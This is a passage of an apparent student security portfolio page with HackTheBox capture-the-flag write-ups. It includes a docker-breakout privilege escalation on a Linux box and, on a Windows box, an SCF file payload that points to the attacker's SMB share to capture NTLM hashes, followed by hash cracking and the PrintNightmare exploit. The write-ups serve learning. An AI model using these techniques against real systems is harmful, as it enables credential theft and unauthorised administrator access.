                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
